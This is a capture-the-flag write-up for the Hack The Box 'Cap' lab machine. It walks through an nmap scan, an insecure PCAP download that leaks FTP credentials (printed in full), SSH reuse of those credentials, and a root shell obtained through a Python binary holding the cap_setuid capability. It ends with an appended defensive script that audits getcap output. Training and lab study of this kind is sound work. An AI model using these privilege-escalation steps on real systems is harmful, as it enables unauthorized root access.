HTB Cap Writeup
INFO
Machine IP = 10.10.10.245
OS = Linux
Level = EASY
Points = 20
Write the IP of the machine to your /etc/hosts file
echo "10.10.10.245 cap.htb" >> /etc/hosts
Scanning
nmap -sC -sV 10.10.10.245
Enumeration
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http gunicorn
FTP (Port 21)
FTP anonymous login not available
HTTP (Port 80)
http://10.10.10.245/
I found that each time I reload or click on the Security Snapshot (5 Second PCAP + Analysis) tab,
the ID variable changes, and with it the PCAP file.
None of them was useful, so let’s try the value 0
http://10.10.10.245/data/0
Then I downloaded the 0.PCAP file and opened it with Wireshark. Here we can find FTP credentials as below:
USER : nathan
PASSWORD : Buck3tH4TF0RM3!
With these credentials we are going to log in to FTP
We got the first flag, user.txt
Let’s use the same credentials for SSH
ssh [email protected] -> with password: Buck3tH4TF0RM3!
Privilege Escalation
Here we are going to clone the linpeas.sh script
Then we found
Files with capabilities (limited to 50):
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
cap_setuid means that a process started from this binary can change its user ID, including to 0 (root), without already being root
Time for privilege escalation
nathan@cap:~$ python3
Python 3.8.5 (default, Jan 27 2021, 15:41:15)
[GCC 9.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.setuid(0)
>>> os.system("/bin/bash")
root@cap:~#
Done!
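For the defensive side of the capability finding above, here is an added example (not part of the original writeup) that parses getcap output in both the older "path = caps+flags" form shown by linpeas here and the newer "path caps=flags" form, and flags binaries holding root-equivalent capabilities. The ROOT_EQUIVALENT shortlist and every sample line except the python3.8 one are assumptions constructed for illustration.

```python
import re

# Capabilities that give a general-purpose binary a direct path to root
# (an assumed shortlist for this example, not an exhaustive or official list).
ROOT_EQUIVALENT = {
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_module", "cap_sys_ptrace",
    "cap_dac_override", "cap_dac_read_search", "cap_chown", "cap_fowner",
}
# One clause of libcap's text form: "cap_a,cap_b+eip", "cap_x=ep", "=ep" (all caps) or a bare "=".
CLAUSE = re.compile(r"^([a-z0-9_,]*)([=+-])([eip]*)$")

# Constructed sample; only the python3.8 line comes from the writeup.
SAMPLE = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet cap_net_raw=ep
/opt/tools/helper =ep
/usr/bin/perl cap_setuid=i
"""

def parse_getcap_line(line):
    """Return (path, {capability: set of flags}) for one line of getcap output."""
    tokens = line.split()
    clauses = []
    # Peel clauses off the right so both output forms and paths with spaces work.
    while len(tokens) > 1 and CLAUSE.match(tokens[-1]):
        clauses.insert(0, tokens.pop())
    caps = {}
    for clause in clauses:
        names, op, flags = CLAUSE.match(clause).groups()
        if op == "-" or not flags:
            continue  # "-" clauses are ignored: over-reporting is the safe side for an audit
        for name in (names.split(",") if names else ["all"]):
            caps.setdefault(name, set()).update(flags)
    return " ".join(tokens), caps

def audit(getcap_output):
    """List (path, risky caps) where a root-equivalent capability is effective or permitted."""
    findings = []
    for line in filter(str.strip, getcap_output.splitlines()):
        path, caps = parse_getcap_line(line)
        # Inheritable-only ("i") grants are not flagged: they do nothing on their own.
        risky = sorted(name for name, flags in caps.items()
                       if (name in ROOT_EQUIVALENT or name == "all") and flags & {"e", "p"})
        if risky:
            findings.append((path, risky))
    return findings

if __name__ == "__main__":
    for path, risky in audit(SAMPLE):
        print(f"{path}: {', '.join(risky)}")
```

Feed it the output of `getcap -r / 2>/dev/null`; a flagged interpreter such as the one on this box can have its file capabilities removed with `setcap -r <path>`.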